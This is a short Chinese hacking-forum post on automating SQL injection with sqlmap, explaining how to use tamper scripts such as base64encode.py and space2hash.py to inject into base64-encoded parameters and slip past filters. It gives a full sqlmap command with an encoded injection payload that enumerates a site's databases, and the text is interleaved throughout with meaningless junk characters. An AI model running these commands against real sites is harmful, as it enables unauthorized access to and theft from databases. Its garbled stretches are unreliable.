WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?( j1 }% O8 y9 f: L+ u0 u3 v
& ], `8 Z" C( y& x- g. ^: ^sqlmap的tamper里有个base64encode.py
8 G. k& m& {# m6 t4 _
, |1 M- }7 B- U" u% m+ k( k8 K1 x9 Z& Z使用如下
q: z& C7 J' [2 V' y, q7 F" r4 S) J( u. V4 y. t. \* w. p
sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
) K8 u9 W/ U: _7 ^1 | a& }8 p1 v [6 B8 F
$ d! { @; I$ C1 c5 _
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
" J+ M1 g+ Q/ \3 W6 n0 }* u1 m% |, A- Z7 {- j( E. j4 p5 N
其中常用到的bypass脚本绕过SQLMAP主要两个脚本:
( v6 _% K' a1 s$ `# \0 p3 b1 L' w( Y* E6 w! P, p6 G( ~
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 x( a" d: v# Y! T: [! K
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入& M) B& v \) E! W/ O
首先确定目标数据库版本,然后选择相应的脚本。
4 M, D; I, F7 P. J3 d' O: L' z-v 3 --batch --tamper "space2hash.py"
7 D/ l, s! G$ O; m' B" i- }: ~7 h% A% d
还有其他一些插件:
+ ^2 h! }- \! K9 ]! E, m$ G7 kencodes编码 ——charencode.py
1 W: P. |, P5 _/ M) cbase64编码 —— base64encode.py
O, p3 i5 @; r% W( R/ ?2 F替换空格和关键字 —— halfversionedmorekeywords.py
# M+ [: K" W$ G" t8 f) ] | $ K; E# W! t) \5 O2 g. w
1 H; v& U& `& c9 e/ k
" H# r$ C. c* W3 j* ^
7 k5 z: u+ M' | |